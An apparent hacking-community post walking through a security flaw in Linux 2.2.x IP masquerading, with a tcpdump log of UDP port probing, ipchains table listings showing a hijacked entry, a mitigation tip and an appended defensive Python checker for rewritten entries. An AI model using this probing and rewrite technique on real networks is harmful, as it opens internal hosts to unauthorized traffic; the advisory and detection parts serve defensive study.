UNDERCODE COMMUNITY
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Security holes in Linux kernel IP masquerading:
t.me/UndercodeTesting


1) The IP masquerading implementation in the Linux 2.2.x kernel has a serious security vulnerability. The relevant kernel code does not adequately check connections. An attacker can rewrite a UDP masquerade entry in the kernel so that the attacker's UDP packets are routed to an internal machine.

2) When an internal host wants to access a DNS server on the external network, the UDP packet it sends passes through the IP masquerading gateway and the kernel adds an entry to record the connection. For example, take a UDP packet sent from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the masquerading gateway (B) and the source port with a port on the gateway. By default these ports run from 61000 to 65096, so in theory the kernel can handle 4096 TCP/UDP masqueraded connections at the same time.

> Host A:1035 -> GW B:63767 -> Host C:53

🦑 HOW IT WORKS?

When a host on the external network sends a UDP packet to the masquerading gateway, Linux IP masquerading decides whether to forward the packet to the internal network based only on the target port. If the target port has a corresponding entry in the table of established masqueraded connections, the kernel updates the remote host IP and port of that entry to the source IP and source port of the packet. So as long as the attacker can determine which gateway port is in use, he can rewrite the masquerade connection table with his own IP and port. The port range the gateway uses for masqueraded connections is usually 61000 to 65096, so it is easy for an external attacker to determine which ports have been used to establish connections. An attacker can send UDP probe packets to these ports on the masquerading gateway and then check the IP ID of the ICMP response for each port. Each time a host sends a packet, the IP ID in its TCP/IP stack increases by one. Therefore, the ICMP response for a port in use for IP masquerading will carry the IP ID of the internal host.

🦑 EXPLOITING

This ID will usually differ considerably from the current IP ID of the gateway host, typically by more than 1000. The following example shows the process of exploiting the weakness:

Host A is an internal host (192.168.1.100).

Host B is the masquerading gateway (192.168.1.1 / 10.0.0.1).

Host C is an external DNS server (10.0.0.25).

Host X is the external attacker's IP (10.10.187.13).

Before the probing, run this command on the masquerading gateway to display the current masquerade connection table: ipchains -L -M -n

> UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53

There is currently one connection, from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25; the masquerading port is 63767.

[Result of tcpdump on the attacker's machine]

(To make the problem easier to see, the source port of all probe packets is set to 12345 here.)

[Our probing starts from port 61000; some of the earlier results are omitted]

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)

10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id 23069)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)

10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id 23070)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)

10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id 23071)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)

10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id 23074)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)

10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id 23083)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos 0xd8] (ttl 244, id 17205)

🦑 The ID of the packet above is 17205, and the difference between it and 13139 exceeds 4000, which means that we have found a masqueraded connection!

10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)

10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)

10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id 13142)

10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)

10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23092)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)

[Our probing ends at port 65096; some results are omitted]

Now let's check the masquerade connection table on the masquerading gateway:

ipchains -L -M -n

> UDP 04:35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345

You can see that the remote host has been replaced by the attacker's IP, 10.10.187.13, and the target port has been replaced by the source port the attacker used for probing: 12345.

Now the attacker can send UDP data from source port 12345 to port 1035 of the internal host.



--------------------------------------------------------------------------------

🦑 Suggestion:

For access to external DNS, a possible solution is to set up a caching domain name server on the masquerading gateway and then prohibit masquerading of UDP packets.

written by undercode
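
A defensive check for the table rewrite shown above, as an added example that is not part of the original post: it compares two `ipchains -L -M -n` snapshots and reports entries whose internal host and masquerade port are unchanged but whose remote endpoint differs. The row layout follows the listings in the post; the header line, the TCP row and the function names are assumptions made for the example.

```python
import re

# One data row of `ipchains -L -M -n`, in the layout the post shows:
#   UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53
ROW = re.compile(
    r"^\s*(?P<proto>[A-Z]+)\s+\S+\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+"
    r"(?P<sport>\d+)\s+\((?P<mport>\d+)\)\s*->\s*(?P<dport>\d+)\s*$"
)


def parse_table(text):
    """Map (proto, internal ip, internal port, masq port) -> (remote ip, port)."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:  # header and blank lines do not match and are skipped
            key = (m["proto"], m["src"], int(m["sport"]), int(m["mport"]))
            table[key] = (m["dst"], int(m["dport"]))
    return table


def rewritten_entries(before, after):
    """Entries present in both snapshots with the same internal side and
    masquerade port, but a different remote endpoint."""
    old, new = parse_table(before), parse_table(after)
    return [
        {"entry": key, "was": old[key], "now": new[key]}
        for key in sorted(old.keys() & new.keys())
        if old[key] != new[key]
    ]


# Constructed snapshots: the UDP rows are the two listings from the post; the
# header line and the TCP row are assumptions added for the example.
BEFORE = """\
prot expire   source          destination     ports
UDP  03:39.21 192.168.1.100   10.0.0.25       1035 (63767) -> 53
TCP  14:02.10 192.168.1.101   10.0.0.80       2201 (61004) -> 80
"""
AFTER = """\
prot expire   source          destination     ports
UDP  04:35.12 192.168.1.100   10.10.187.13    1035 (63767) -> 12345
TCP  13:58.47 192.168.1.101   10.0.0.80       2201 (61004) -> 80
"""

if __name__ == "__main__":
    for hit in rewritten_entries(BEFORE, AFTER):
        proto, ip, port, mport = hit["entry"]
        print(f"{proto} {ip}:{port} via masq port {mport}: "
              f"remote {hit['was']} -> {hit['now']}")
```

An entry that expired and was re-created on the same masquerade port for a different remote host would be flagged as well, so each hit is a lead to check against the internal host's real traffic.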
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FRESH ELITE PROXIES
